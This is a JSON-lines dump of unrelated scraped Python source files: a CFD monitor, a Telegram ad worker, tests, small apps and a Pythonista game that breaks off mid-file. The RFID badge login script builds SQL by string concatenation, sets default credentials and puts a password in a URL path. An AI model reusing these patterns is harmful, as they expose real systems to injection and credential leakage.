'coefficient'\n\n def _updateChart(self, data):\n if self._running:\n self._chart1.appendData(pd.DataFrame(data, columns=['Cd']))\n self._chart2.appendData(pd.DataFrame(data, columns=['Cl']))\n self._chart3.appendData(pd.DataFrame(data, columns=['CmPitch']).rename(columns={'CmPitch': 'Cm'}))\n\n def _fitChart(self):\n if self._running:\n self._chart1.fitChart()\n self._chart2.fitChart()\n self._chart3.fitChart()\n\n\nclass PointMonitor(Monitor):\n def __init__(self, name, chart):\n super().__init__(name)\n\n self._xpath = MonitorDB.getPointMonitorXPath(name)\n\n self._showChart = self._db.getValue(self._xpath + '/showChart') == 'true'\n self._rname = '' # Working only for Single Region Cases. ToDo: find a region by using vtkStaticCellLocator\n self._chart = chart\n\n self._chart.setTitle(name)\n\n @property\n def fileName(self):\n return FieldHelper.DBFieldKeyToField(self._db.getValue(self._xpath + '/field/field'),\n self._db.getValue(self._xpath + '/field/mid'))\n\n @property\n def extension(self):\n return ''\n\n def _updateChart(self, data):\n if self._running:\n self._chart.appendData(data)\n\n def _fitChart(self):\n if self._running:\n self._chart.fitChart()\n\n\nclass SurfaceMonitor(Monitor):\n def __init__(self, name, chart):\n super().__init__(name)\n\n xpath = MonitorDB.getSurfaceMonitorXPath(name)\n\n self._showChart = self._db.getValue(xpath + '/showChart') == 'true'\n self._rname = BoundaryDB.getBoundaryRegion(self._db.getValue(xpath + '/surface'))\n self._chart = chart\n\n self._chart.setTitle(name)\n\n @property\n def fileName(self):\n return 'surfaceFieldValue'\n\n def _updateChart(self, data):\n if self._running:\n self._chart.appendData(data)\n\n def _fitChart(self):\n if self._running:\n self._chart.fitChart()\n\n\nclass VolumeMonitor(Monitor):\n def __init__(self, name, chart):\n super().__init__(name)\n\n xpath = MonitorDB.getVolumeMonitorXPath(name)\n\n self._showChart = self._db.getValue(xpath + '/showChart') == 'true'\n self._rname = CellZoneDB.getCellZoneRegion(self._db.getValue(xpath + '/volume'))\n self._chart = chart\n\n self._chart.setTitle(name)\n\n @property\n def fileName(self):\n return 'volFieldValue'\n\n def _updateChart(self, data):\n if self._running:\n self._chart.appendData(data)\n\n def _fitChart(self):\n if self._running:\n self._chart.fitChart()\n\n","repo_name":"nextfoam/baram","sub_path":"baramFlow/openfoam/post_processing/monitor.py","file_name":"monitor.py","file_ext":"py","file_size_in_byte":8081,"program_lang":"python","lang":"en","doc_type":"code","stars":48,"dataset":"github-code","pt":"72"} +{"seq_id":"24155970474","text":"from models import Task, Offer, MessageQueue\nfrom constants import *\nfrom sqlalchemy import and_, or_\nfrom global_web_instances import app, db\n\nimport telebot\n\nbot = telebot.TeleBot(BOT_TOKEN)\n\nclass TaskWorker():\n __instance = None\n\n @classmethod \n def getInstance(cls):\n \"\"\" Static access method. 
\"\"\"\n if TaskWorker.__instance == None:\n TaskWorker()\n\n return TaskWorker.__instance\n \n def __init__(self):\n if TaskWorker.__instance != None:\n raise Exception(\"This class is a singleton!\")\n else:\n TaskWorker.__instance = self\n\n def message_queue_create(self):\n # AUTOMATIC TASKS\n tasks = Task.query.filter( and_(\n Task.status == TASK_STATUS['APPROVED'],\n Task.taskType == TASK_TYPE['AUTOMATIC']\n )\n ).limit(30).all()\n\n for task in tasks:\n message_queue = MessageQueue()\n\n message_queue.create_message(task, postTime)\n\n task.change_status(TASK_STATUS['QUEUED'])\n\n # MANUAL TASKS\n #tasks_manual = Task.query.filter( and_(\n # Task.status == TASK_STATUS['APPROVED'],\n # Task.taskType == TASK_TYPE['MANUAL']\n #)\n #).limit(30).all()\n\n #for task in tasks_manual:\n #task.change_status(TASK_STATUS['SENDED'])\n # send link in private chat to MANUAL publishing\n # NOTIFICATION_WORKER\n #bot.send_message(task.user.username, botLink, 1)\n\n # depricated (in Kirill code?)\n def post_messages(self):\n message_queues = MessageQueue.query.filter(\n MessageQueue.status == MESSAGE_STATUS['NEW']\n ).limit(30).all()\n\n for message_queue in message_queues:\n task = message_queue.task\n offer = task.offer\n # link in private chat with Bot\n link = botLink\n\n message = task.previevText + link\n\n # send msg in all channels\n channels = Channel.query.filter(and_(partnerId=task.affilId, status='ACTIVE')).all()\n for channel in channels: \n if channel.categoryListAff.category.id == task.offer.categoryListAdv.category.id:\n chatId = -1001321811797 # test\n #chatId = channel.tgUrl\n bot.send_message(chatId, message, 1)\n\n message_queue.change_status(MESSAGE_STATUS['PUBLISHED'])\n \n\n def deactivate_adv_activity(self, adv):\n Offer.query.filter_by(advertId=adv).update({'status': 'INACTIVE'})\n offers = Offer.query.filter_by(advertId=adv).all()\n\n for offer in offers:\n Task.query.filter_by(offerId=offer.id).update({'status': TASK_STATUS['PAUSED']})\n tasks = Task.query.filter_by(offerId=offer.id).all()\n \n for task in tasks:\n MessageQueue.query.filter_by(taskId=task.id).update({'status': MESSAGE_STATUS['DEACTIVATED']})\n \n db.session.commit()\n\n\n def activate_adv_activity(self, adv):\n Offer.query.filter_by(advertId=adv).update({'status': 'ACTIVE'})\n offers = Offer.query.filter_by(advertId=adv).all()\n\n for offer in offers:\n Task.query.filter_by(offerId=offer.id).update({'status': TASK_STATUS['QUEUED']})\n tasks = Task.query.filter_by(offerId=offer.id).all()\n \n for task in tasks:\n MessageQueue.query.filter_by(taskId=task.id).update({'status': MESSAGE_STATUS['NEW']})\n \n db.session.commit()\n","repo_name":"kshilov/tcard","sub_path":"aff_network/task_worker.py","file_name":"task_worker.py","file_ext":"py","file_size_in_byte":3555,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"41458333019","text":"#\n# @lc app=leetcode id=937 lang=python3\n#\n# [937] Reorder Data in Log Files\n#\n\n# @lc code=start\nclass Solution:\n def reorderLogFiles(self, logs: List[str]) -> List[str]:\n digs = list(filter(lambda x: x.split(' ')[1].isdecimal(), logs))\n lets = sorted(list(filter(lambda x: x.split(\n ' ')[1].isalpha(), logs)), key=lambda x: (' '.join(x.split(' ')[1:]), x.split(' ')[0]))\n\n return lets+digs\n# @lc 
code=end\n","repo_name":"HOZH/leetCode","sub_path":"leetCodePython2020/937.reorder-data-in-log-files.py","file_name":"937.reorder-data-in-log-files.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"4359663300","text":"import argparse\nfrom os import system\n\nparser = argparse.ArgumentParser(description='Installation script for \"Bot channel\\'s info\"')\nparser.add_argument('token', type=str, metavar='BOT_TOKEN', help='Bot api token')\nparser.add_argument('api_id', type=int, metavar='API_ID', help='Telegram API id')\nparser.add_argument('api_hash', type=str, metavar='API_HASH', help='Telegram API hash')\nparser.add_argument('secret_key', type=str, metavar='SECRET_KEY', help='Secret key for auth in bot')\n\nargs = parser.parse_args()\n\n\nwith open('pre_cfg.py', 'w') as f:\n lines = [\n f'TOKEN = \\'{args.token}\\'\\n',\n f'API_ID = {args.api_id}\\n',\n f'API_HASH = \\'{args.api_hash}\\'\\n',\n f'SECRET_KEY = \\'{args.secret_key}\\'\\n'\n ]\n f.writelines(lines)\n\nprint('Installed')\n","repo_name":"diSp1rIt/Bot-channels-info","sub_path":"install.py","file_name":"install.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"18136858754","text":"\"\"\"\nMake text in the last row of every table bold\n\"\"\"\n\nimport panflute as pf\n\n\ndef action(elem, doc):\n if isinstance(elem, pf.TableRow):\n # Exclude table headers (which are not in a list)\n if elem.index is None:\n return\n\n if elem.next is None:\n pf.debug(elem)\n elem.walk(make_emph)\n\n\ndef make_emph(elem, doc):\n if isinstance(elem, pf.Str):\n return pf.Emph(elem)\n\n\ndef main(doc=None):\n return pf.run_filter(action, doc=doc) \n\n\nif __name__ == '__main__':\n main()\n","repo_name":"sergiocorreia/panflute","sub_path":"docs/source/_static/emph-last-row.py","file_name":"emph-last-row.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":468,"dataset":"github-code","pt":"72"} +{"seq_id":"74890464232","text":"import sqlite3\nfrom tkinter import *\nimport requests\nimport RPi.GPIO as GPIO\nfrom mfrc522 import SimpleMFRC522\n\n\ndef formSaisie():\n window = Tk()\n \n l1 = Label (window, text =\"identifient\")\n l1.pack()\n \n v1 = StringVar()\n v1.set(\"jeanne\")\n e1 = Entry(window,textvariable=v1)\n e1.pack()\n \n l2 = Label (window, text =\"mot de passe\")\n l2.pack()\n \n v2 = StringVar()\n v2.set(\"jeanne\")\n e2 = Entry(window,textvariable=v2)\n e2.pack()\n \n b1 = Button(window, text=\"OK\", command=lambda:verifId(window,e1.get(),e2.get()))\n b1.pack()\n \n b2 = Button(window, text=\"cancel\", command=window.destroy)\n b2.pack()\n \n window.mainloop()\n \ndef formBadge(nom):\n windowx = Tk()\n l3 = Label (windowx, text =\"passer votre badge\")\n l3.pack()\n \n #reader = SimpleMFRC522()\n #try:\n # id1, text = reader.read()\n # print(id)\n # print(text)\n #finally:\n # GPIO.cleanup()\n id1 = 996305625869\n b3 = Button(windowx, text=\"OK\", command=lambda:verifBadge(id1,nom, windowx))\n b3.pack()\n \ndef formRecoFacial():\n print(\"test\")\n \ndef verifBadge(id1, nom, windowx):\n api_root=\"https://www.btssio-carcouet.fr/ppe4/public/badge/\"+nom+\"/\"+str(id1)\n req = requests.get(api_root)\n wb = req.json()\n print(wb)\n if wb['status'] == \"true\" :\n print(\"ok\")\n windowx.destroy()\n formRecoFacial()\n else :\n print(\"error\")\ndef verifId(window,e1,e2):\n 
api_root=\"https://www.btssio-carcouet.fr/ppe4/public/connect2/\"+e1+\"/\"+e2+\"/infirmiere\"\n req = requests.get(api_root)\n wb = req.json()\n print(wb)\n if not ('status' in wb is False):\n print(\"ok\")\n window.destroy()\n formBadge(wb['nom'])\n else :\n print(\"error\")\n \ndef MaBase(numPhase, identifient, numBadge, commentaire):\n con = sqlite3.connect('kliemie.db')\n c = con.cursor()\n c.execute(\"insert into logAcces(numPhase,identifiant,numBadge,commentaire) VALUES (\"+str(numPhase)+\",'\"+identifient+\"','\"+numBadge+\"','\"+commentaire+\"');\")\n con.commit()\n\nformSaisie()\n","repo_name":"LeLouPhoque/recoOpenCV","sub_path":"base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"16491262016","text":"from flask import Flask,render_template\nfrom .xls.read_xls import get_card\n\napp = Flask(__name__)\n@app.route(\"/\")\ndef top_page():\n return \"Top Page\"\n\n@app.route(\"/card/\")\ndef card(num):\n card_num = int(num)\n card_num = abs(card_num)\n card = get_card(card_num)\n return render_template(\"card.html\",card=card)\n\n@app.route(\"/cards\")\ndef cards():\n cards = [get_card(i+1) for i in range(100)]\n return render_template(\"cards.html\",cards=cards)","repo_name":"s-n-1-0/circ-cl","sub_path":"card_flask/app/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70513163754","text":"############\n#\nfrom importlib import reload\n\nfrom discord import PartialEmoji\nfrom discord.ext.commands import Cog, guild_only, hybrid_command, is_owner\n\nfrom Classes import ShakeBot, ShakeContext, Testing, _, extras, locale_doc, setlocale\n\nfrom ..information import Information\nfrom . import testing, vote\n\n\n########\n#\nclass vote_extension(Information):\n def __init__(self, bot: ShakeBot) -> None:\n super().__init__(bot=bot)\n try:\n reload(vote)\n except:\n pass\n\n @property\n def display_emoji(self) -> PartialEmoji:\n return PartialEmoji(name=\"\\N{CROWN}\")\n\n @hybrid_command(name=\"vote\")\n @extras(beta=True, owner=True)\n @guild_only()\n @is_owner()\n @setlocale()\n @locale_doc\n async def vote(self, ctx: ShakeContext):\n _(\n \"\"\"Get information about Shake+.\n\n Of course, you dont have to. 
It's like a tip\"\"\"\n )\n\n if ctx.testing:\n try:\n reload(testing)\n except Exception as e:\n await self.bot.testing_error(module=testing, error=e)\n ctx.testing = False\n do = testing if ctx.testing else vote\n\n try:\n await do.command(ctx=ctx).__await__()\n\n except:\n if ctx.testing:\n raise Testing\n raise\n\n\nasync def setup(bot: ShakeBot):\n await bot.add_cog(vote_extension(bot))\n\n\n#\n############\n","repo_name":"Shake-The-Bot/Source","sub_path":"Extensions/Commands/Information/vote/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1433,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"465312639","text":"# coding: utf-8\nfrom __future__ import unicode_literals, absolute_import, division, print_function\n\nimport json\n\nimport pytest\nfrom django.test import Client\nfrom hamcrest import has_entries, assert_that, contains_inanyorder, contains\n\nfrom common.data_api.baris.test_helpers import mock_baris_response\nfrom common.models.transport import TransportType\nfrom common.tester.factories import create_station, create_company, create_settlement, create_transport_model\nfrom common.tester.utils.datetime import replace_now\n\n\npytestmark = [pytest.mark.dbuser]\n\ncreate_plane_station = create_station.mutate(t_type=TransportType.PLANE_ID, type_choices='tablo')\n\n\n@replace_now('2020-06-01')\n@pytest.mark.parametrize('yandex_avia_code, expected_url', [\n ('su_aeroflot', 'https://travel-test.yandex.ru/avia/airline/su_aeroflot/?utm_medium=rasp_airline&utm_source=rasp'),\n ('', None),\n (None, None)\n])\ndef test_company_yandex_avia_url(yandex_avia_code, expected_url):\n station_from = create_plane_station(id=101)\n station_to = create_plane_station(id=102)\n create_company(yandex_avia_code=yandex_avia_code, id=301)\n\n with mock_baris_response({\n 'flights': [{\n 'airlineID': 301,\n 'departureStation': 101,\n 'arrivalStation': 102,\n 'title': 'SU 1',\n 'route': [101, 102],\n 'transportModelID': 201,\n 'departureDatetime': '2020-06-01T01:30:00+05:00',\n 'arrivalDatetime': '2020-06-01T05:00:00+05:00',\n }]\n }):\n response = json.loads(Client().get('/ru/search/search/', {\n 'national_version': 'ru',\n 'pointFrom': station_from.point_key,\n 'pointTo': station_to.point_key,\n 'when': '2020-06-01',\n 'transportType': 'plane'\n }).content)\n\n assert_that(response['result']['segments'], contains_inanyorder(\n has_entries({\n 'company': has_entries({\n 'yandexAviaUrl': expected_url,\n })\n }),\n ))\n\n\ndef _create_db_items():\n settlement1 = create_settlement(id=91, title='От', slug='ot', time_zone='Etc/GMT-3')\n settlement2 = create_settlement(id=92, title='До', slug='do', time_zone='Etc/GMT-5')\n create_plane_station(id=100, title='Раньше')\n create_plane_station(id=101, settlement=settlement1, time_zone='Etc/GMT-3', title='от')\n create_plane_station(id=102, settlement=settlement2, time_zone='Etc/GMT-5', title='до')\n create_company(id=301, title='Компания1', url='url1', yandex_avia_code='Company1')\n create_company(id=302, title='Компания2', url='url2', yandex_avia_code='Company2')\n create_transport_model(id=201, title='Самолет1')\n\n\nONE_DAY_P2P_BARIS_RESPONSE = {\n 'departureStations': [101],\n 'arrivalStations': [102],\n 'flights': [\n {\n 'airlineID': 301,\n 'title': 'SU 1',\n 'departureDatetime': '2020-06-01T01:30:00+03:00',\n 'departureTerminal': 'A',\n 'departureStation': 101,\n 'arrivalDatetime': '2020-06-01T05:00:00+05:00',\n 'arrivalTerminal': '',\n 'arrivalStation': 102,\n 
'transportModelID': 201,\n 'codeshares': [{\n 'airlineID': 302,\n 'title': 'SV 1'\n }],\n 'route': [100, 101, 102],\n 'source': 'flight-board',\n }\n ]\n}\n\n\n@replace_now('2020-06-01')\n@pytest.mark.parametrize('nearest, latest_datetime, when', [\n (False, '2020-06-02T01:00:00+00:00', '2020-06-01'),\n (False, '2020-06-02T01:00:00+00:00', 'today'),\n (True, '2020-05-31T22:30:00+00:00', None)\n])\ndef test_baris_one_day_search(nearest, latest_datetime, when):\n _create_db_items()\n\n with mock_baris_response(ONE_DAY_P2P_BARIS_RESPONSE):\n search_params = {\n 'national_version': 'ru',\n 'transportType': 'plane',\n 'pointFrom': 'c91',\n 'pointTo': 'c92',\n 'nearest': nearest,\n }\n if not nearest:\n search_params['when'] = when\n\n response = Client().get('/ru/search/search/', search_params)\n\n if nearest:\n assert response.data['result']['canonical'] is None\n else:\n assert_that(response.data['result']['canonical'], has_entries({\n 'transportType': 'plane',\n 'pointFrom': 'ot',\n 'pointTo': 'do',\n }))\n\n assert_that(response.data['result'], has_entries({\n 'archivalData': None,\n 'context': has_entries({\n 'transportTypes': ['plane'],\n 'isChanged': False,\n 'latestDatetime': latest_datetime,\n 'search': has_entries({\n 'nearest': nearest,\n 'pointFrom': has_entries({\n 'titleWithType': 'г. От',\n 'title': 'От',\n 'key': 'c91',\n 'slug': 'ot',\n }),\n 'pointTo': has_entries({\n 'titleWithType': 'г. До',\n 'title': 'До',\n 'key': 'c92',\n 'slug': 'do',\n })\n }),\n 'original': has_entries({\n 'nearest': nearest,\n 'pointFrom': has_entries({\n 'titleWithType': 'г. От',\n 'title': 'От',\n 'key': 'c91',\n 'slug': 'ot',\n }),\n 'pointTo': has_entries({\n 'titleWithType': 'г. До',\n 'title': 'До',\n 'key': 'c92',\n 'slug': 'do',\n })\n })\n }),\n\n 'segments': contains(\n has_entries({\n 'departure': '2020-05-31T22:30:00+00:00',\n 'arrival': '2020-06-01T00:00:00+00:00',\n 'departureLocalDt': '2020-06-01T01:30:00+03:00',\n 'arrivalLocalDt': '2020-06-01T05:00:00+05:00',\n 'startDate': '2020-06-01',\n 'departureEvent': None,\n 'thread': has_entries({\n 'number': 'SU 1',\n 'title': 'Раньше \\u2013 До',\n 'comment': '',\n 'uid': '',\n 'density': '',\n 'beginTime': None,\n 'endTime': None,\n 'schedulePlanCode': None,\n 'isAeroExpress': False,\n 'isExpress': False,\n 'isBasic': True\n }),\n 'isThroughTrain': False,\n 'title': 'Раньше \\u2013 До',\n 'company': has_entries({\n 'title': 'Компания1',\n 'url': 'url1',\n 'yandexAviaUrl': 'https://travel-test.yandex.ru/avia/airline/Company1/?utm_medium=rasp_airline&utm_source=rasp',\n 'hidden': False,\n 'id': 301\n }),\n 'suburbanFacilities': None,\n 'number': 'SU 1',\n 'stops': '',\n 'departureEventKey': None,\n 'isInterval': False,\n 'tariffsKeys': ['SU 1'] if nearest else ['daemon SU-1 0601'],\n 'stationFrom': has_entries({\n 'settlementId': 91,\n 'title': 'от',\n 'id': 101\n }),\n 'stationTo': has_entries({\n 'settlementId': 92,\n 'title': 'до',\n 'id': 102\n }),\n 'duration': 5400,\n 'arrivalEvent': None,\n 'arrivalEventKey': None,\n 'transport': has_entries({\n 'model': {'title': 'Самолет1'},\n 'code': 'plane',\n 'id': 2,\n 'title': 'Самолёт'\n })\n })\n )\n }))\n\n if not nearest:\n assert_that(response.data['result']['segments'][0]['codeshares'][0], has_entries({\n 'number': 'SV 1',\n 'tariffsKeys': ['daemon SV-1 0601'],\n 'company': has_entries({\n 'title': 'Компания2',\n 'url': 'url2',\n 'yandexAviaUrl': 'https://travel-test.yandex.ru/avia/airline/Company2/?utm_medium=rasp_airline&utm_source=rasp',\n 'hidden': False,\n 'id': 302\n }),\n 
}))\n\n\nALL_DAYS_P2P_BARIS_RESPONSE = {\n 'departureStations': [101],\n 'arrivalStations': [102],\n 'flights': [\n {\n 'airlineID': 301,\n 'title': 'SU 1',\n 'departureTime': '01:30',\n 'departureTimezone': '+0300',\n 'departureStation': 101,\n 'arrivalTime': '05:00',\n 'arrivalTimezone': '+0500',\n 'arrivalStation': 102,\n 'arrivalDayShift': 0,\n 'transportModelID': 201,\n 'codeshares': [{\n 'airlineID': 302,\n 'title': 'SV 1'\n }],\n 'route': [100, 101, 102],\n 'source': 'flight-board',\n 'masks': [\n {\n 'from': '2020-06-01',\n 'until': '2020-06-30',\n 'on': 2\n }\n ]\n }\n ]\n}\n\n\n@replace_now('2020-06-01')\ndef test_baris_all_days_search():\n _create_db_items()\n\n with mock_baris_response(ALL_DAYS_P2P_BARIS_RESPONSE):\n search_params = {\n 'national_version': 'ru',\n 'transportType': 'plane',\n 'pointFrom': 'c91',\n 'pointTo': 'c92',\n }\n\n response = Client().get('/ru/search/search/', search_params)\n\n assert_that(response.data['result'], has_entries({\n 'canonical': has_entries({\n 'transportType': 'plane',\n 'pointFrom': 'ot',\n 'pointTo': 'do',\n }),\n 'archivalData': None,\n 'context': has_entries({\n 'transportTypes': ['plane'],\n 'isChanged': False,\n 'latestDatetime': None,\n 'search': has_entries({\n 'nearest': False,\n 'pointFrom': has_entries({\n 'titleWithType': 'г. От',\n 'title': 'От',\n 'key': 'c91',\n 'slug': 'ot',\n }),\n 'pointTo': has_entries({\n 'titleWithType': 'г. До',\n 'title': 'До',\n 'key': 'c92',\n 'slug': 'do',\n })\n }),\n 'original': has_entries({\n 'nearest': False,\n 'pointFrom': has_entries({\n 'titleWithType': 'г. От',\n 'title': 'От',\n 'key': 'c91',\n 'slug': 'ot',\n }),\n 'pointTo': has_entries({\n 'titleWithType': 'г. До',\n 'title': 'До',\n 'key': 'c92',\n 'slug': 'do',\n })\n })\n }),\n\n 'segments': contains(\n has_entries({\n 'departure': '2020-06-01T22:30:00+00:00',\n 'arrival': '2020-06-02T00:00:00+00:00',\n 'departureLocalDt': '2020-06-02T01:30:00+03:00',\n 'arrivalLocalDt': '2020-06-02T05:00:00+05:00',\n 'startDate': '2020-06-02',\n 'daysByTimezone': {\n 'Etc/GMT-3': {'text': '2, 9, 16, 23, 30 июня'}\n },\n 'runDays': {\n '2020': {\n '6': [\n 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 1\n ]\n }\n },\n 'departureEvent': None,\n 'thread': has_entries({\n 'number': 'SU 1',\n 'title': 'Раньше \\u2013 До',\n 'comment': '',\n 'uid': '',\n 'density': '',\n 'beginTime': None,\n 'endTime': None,\n 'schedulePlanCode': None,\n 'isAeroExpress': False,\n 'isExpress': False,\n 'isBasic': True\n }),\n 'isThroughTrain': False,\n 'title': 'Раньше \\u2013 До',\n 'company': has_entries({\n 'title': 'Компания1',\n 'url': 'url1',\n 'yandexAviaUrl': 'https://travel-test.yandex.ru/avia/airline/Company1/?utm_medium=rasp_airline&utm_source=rasp',\n 'hidden': False,\n 'id': 301\n }),\n 'suburbanFacilities': None,\n 'number': 'SU 1',\n 'stops': '',\n 'departureEventKey': None,\n 'isInterval': False,\n 'tariffsKeys': ['SU 1'],\n 'stationFrom': has_entries({\n 'settlementId': 91,\n 'title': 'от',\n 'id': 101\n }),\n 'stationTo': has_entries({\n 'settlementId': 92,\n 'title': 'до',\n 'id': 102\n }),\n 'duration': 5400,\n 'arrivalEvent': None,\n 'arrivalEventKey': None,\n 'transport': has_entries({\n 'model': {'title': 'Самолет1'},\n 'code': 'plane',\n 'id': 2,\n 'title': 'Самолёт'\n })\n })\n )\n 
}))\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"travel/tests/search/search/views/test_baris_search_view.py","file_name":"test_baris_search_view.py","file_ext":"py","file_size_in_byte":14776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19841955789","text":"import os\nimport time\nimport sys\n\ndef typewriter(text):\n for char in text:\n sys.stdout.write(char)\n sys.stdout.flush()\n if text != \"\\n\":\n time.sleep(0.1)\n else:\n time.sleep(1)","repo_name":"muhammadzaki693/zaky","sub_path":"zaki_project/zaki/usl.py","file_name":"usl.py","file_ext":"py","file_size_in_byte":198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15377144721","text":"# Import the supporting functions and classes\nengine = 'ista'\nfrom scene import *\nimport motion\nimport ui\nimport scene_drawing\nimport sound\nimport numpy as np\nfrom drubbleFunc import *\n\n# Window size\nwidth = max(get_screen_size())\nheight = min(get_screen_size())\n\ndef makeSplashScreen(obj):\n if gs.showedSplash:\n obj.background_color = skyBlue\n image(splash, 0, 0, width, height)\n else:\n k = float(obj.kSplash) / 255.0\n obj.background_color = (skyBlue[0] * k, skyBlue[1] * k, skyBlue[2] * k)\n image(splash, 0, 0, width, height)\n if k >= 1:\n gs.showedSplash = True\n\n\ndef linePlot(x, y, m2p, po, w, h, clr, wgt):\n x, y = xy2p(x, y, m2p, po, w, h)\n stroke(clr)\n stroke_weight(wgt)\n for k in range(1, np.size(x)):\n line(x[k - 1], y[k - 1], x[k], y[k])\n\n\ndef initStick(self, alph, sz, ap, ps):\n Stick = SpriteNode('a/crossHair.png', parent=self)\n Stick.size = (sz, sz)\n Stick.anchor_point = ap\n Stick.position = ps\n Stick.x = (ps[0] - ap[0] * sz, ps[0] + (1 - ap[0]) * sz)\n Stick.y = (ps[1] - ap[1] * sz, ps[1] + (1 - ap[1]) * sz)\n Stick.cntr = ((Stick.x[0] + Stick.x[1]) / 2, (Stick.y[0] + Stick.y[1]) / 2)\n Stick.ctrl = (0, 0)\n Stick.id = None\n\n Aura = SpriteNode('shp:Circle')\n # Aura = ShapeNode(circle,'white')\n # circle = ui.Path.oval (0, 0, 0.5*sz,0.5*sz)\n Aura.size = (0.5 * sz, 0.5 * sz)\n Aura.position = Stick.cntr\n return Stick, Aura\n\n\ndef touchStick(loc, stick):\n tCnd = [loc[0] > stick.x[0],\n loc[0] < stick.x[1],\n loc[1] > stick.y[0],\n loc[1] < stick.y[1]]\n\n # Touched inside the stick\n if all(tCnd):\n x = min(max(p.tsens * (2 * (loc[0] - stick.x[0]) / stick.size[0] - 1), -1), 1)\n y = min(max(p.tsens * (2 * (loc[1] - stick.y[0]) / stick.size[1] - 1), -1), 1)\n\n #mag = np.sqrt(x ** 2 + y ** 2)\n #ang = np.around(4 * np.arctan2(y, x) / np.pi) * np.pi / 4\n\n #return (mag * np.cos(ang), mag * np.sin(ang))\n return x, y\n else:\n return (0, 0)\n\n\ndef toggleVisibleSprites(self, boule):\n if boule:\n self.moveStick.alpha = 0.5\n self.moveAura.alpha = 0.5\n self.tiltStick.alpha = 0.5\n self.tiltAura.alpha = 0.5\n self.add_child(self.ball)\n self.add_child(self.head)\n self.add_child(self.stool)\n if p.nPlayer > 1:\n self.add_child(self.head1)\n self.add_child(self.stool1)\n self.time_label.alpha = 1\n self.dist_label.alpha = 1\n self.high_label.alpha = 1\n self.boing_label.alpha = 1\n self.score_label.alpha = 1\n self.actionButt.add()\n self.option_butt.add()\n else:\n self.moveStick.alpha = 0\n self.moveAura.alpha = 0\n self.tiltStick.alpha = 0\n self.tiltAura.alpha = 0\n self.ball.remove_from_parent()\n self.head.remove_from_parent()\n self.head1.remove_from_parent()\n self.stool.remove_from_parent()\n self.stool1.remove_from_parent()\n self.time_label.alpha = 
0\n self.dist_label.alpha = 0\n self.high_label.alpha = 0\n self.boing_label.alpha = 0\n self.score_label.alpha = 0\n self.actionButt.rm()\n self.option_butt.rm()\n\ndef makeMarkers(xrng, m2p, po):\n\n xrng_r = np.around(xrng, -1)\n xrng_n = int((xrng_r[1] - xrng_r[0]) / 10.0) + 1\n for k in range(0, xrng_n):\n xr = xrng_r[0] + 10 * k\n\n [start_x, start_y] = xy2p(xr, 0, m2p, po, width, height)\n [end_x, end_y] = xy2p(xr, -1, m2p, po, width, height)\n stroke(white)\n stroke_weight(1)\n line(start_x, start_y, end_x, end_y)\n fsize = min(24, int(m2p))\n text(str(int(xr)), font_name=p.MacsFavoriteFont, font_size=fsize, x=start_x - 2,\n y=start_y + m2p / 20.0, alignment=1)\n\n\n# Set the keyboard input and mouse defaults\nkeyPush = np.zeros(8)\n\n# Initialize gamestate\ngs = GameState(p.u0, engine)\n\n# Initialize stats\nstats = GameScore()\n\n# Initialize drums\ndrums = DrumBeat()\ndrum_player = [sound.Player(drums.loop[k]) for k in range(drums.nloops)]\n\nclass MyBackground:\n # Size of the black bar on the bottom of the screen\n bottomLineHeight = height / 20.0\n\n # Set size of the background, before updates\n sz_orig = w_orig, h_orig = (2400.0, 400.0)\n\n # Number of background images\n num_bg = 3\n\n # Import the background images\n bg = []\n for n in range(num_bg):\n name = 'a/bg' + str(n) + '.png'\n bg.append(scene_drawing.load_image_file(name))\n\n # Randomize the start location in the background\n xpos = np.random.rand() * 100.0 * num_bg\n\n def __init__(self, **kwargs):\n super(MyBackground, self).__init__(**kwargs)\n\n self.width = width\n self.height = height\n\n def update(self, x, y, w, h, m2p): \n # xmod is normalized position of the player between 0 and num_bg\n xmod = np.mod(x+self.xpos, 100.0*self.num_bg)/100.0\n xrem = np.mod(xmod, 1)\n xflr = int(np.floor(xmod))\n\n # xsel selects which background textures are used TBR\n if xrem <= 0.5:\n xsel = xflr - 1\n else:\n xsel = xflr\n\n # scf is the scale factor to apply to the background\n scf = (m2p / 70.0) ** 0.5\n img_w = int(np.around(self.w_orig * scf))\n img_h = int(np.around(self.h_orig * scf))\n\n # Decide which textures are used\n idx_left = xsel\n if xsel < (self.num_bg - 1):\n idx_right = xsel + 1\n else:\n idx_right = 0\n\n # Determine where the edge is located\n if xrem <= 0.5:\n # Player is in the right frame\n edge = int(np.around(w / 2.0 - xrem * img_w))\n else:\n # Player is in the left frame\n edge = int(np.around(w / 2.0 + (1.0 - xrem) * img_w))\n\n # Position the textures\n overlap = 0.0\n bg_left0 = edge - (1 - overlap) * img_w\n bg_left1 = edge - overlap * img_w\n\n # Draw the textures\n scene_drawing.image(self.bg[idx_left], bg_left0, self.bottomLineHeight, img_w, img_h)\n scene_drawing.image(self.bg[idx_right], bg_left1, self.bottomLineHeight, img_w, img_h)\n\n\n# Create OptionButtons class\nclass OptionButtons:\n def __init__(self, anchor_point=(0.5, 0.5), rm_pos=(0, 1.1*height), **kwargs):\n # Get the keyword arguments\n text = kwargs['text']\n font = kwargs['font']\n self.pos = kwargs['position']\n self.rm_pos = rm_pos\n 